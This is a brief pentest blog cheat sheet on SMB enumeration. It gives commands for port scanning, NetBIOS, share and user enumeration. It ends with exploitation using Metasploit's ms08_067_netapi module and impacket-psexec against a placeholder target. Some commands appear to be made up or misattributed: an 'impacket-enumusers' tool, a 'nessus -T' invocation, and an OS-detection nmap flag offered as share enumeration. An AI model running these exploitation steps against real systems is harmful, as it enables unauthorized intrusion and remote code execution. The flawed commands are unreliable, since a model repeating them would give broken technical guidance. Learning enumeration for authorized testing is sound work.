RatSec

RatSec Blog

SMB Enumeration

- Posted in Uncategorized by

SMB enumeration

  1. Identify the target IP address or hostname. This can be done using tools such as Nmap or Netcat.
nmap -sT -p 139,445 <target IP address>
nc -v <target IP address> 139
  1. Enumerate NetBIOS information. This can be done using tools such as Nmblookup, Nbtscan, or Nmap.
nmblookup -A <target IP address>
nbtscan <target IP address>
nmap -sT -p 139,445 -A <target IP address>
  1. Enumerate SMB shares. This can be done using tools such as Smbmap, Smbclient, or Nmap.
smbmap -H <target IP address>
smbclient -L <target IP address>
nmap -sT -p 139,445 -O <target IP address>
  1. Enumerate SMB users. This can be done using tools such as Metasploit or Impacket.
msfconsole
use auxiliary/scanner/smb/smb_enumusers
set rhosts <target IP address>
run
impacket-enumusers <target IP address>
  1. Enumerate SMB vulnerabilities. This can be done using tools such as Nmap or Nessus.
nmap -sT -p 139,445 -A -v <target IP address>
nessus -T <target IP address>
  1. Perform SMB exploitation. This can be done using tools such as Metasploit or Impacket.
msfconsole
use exploit/windows/smb/ms08_067_netapi
set rhosts <target IP address>
run
impacket-psexec <target IP address>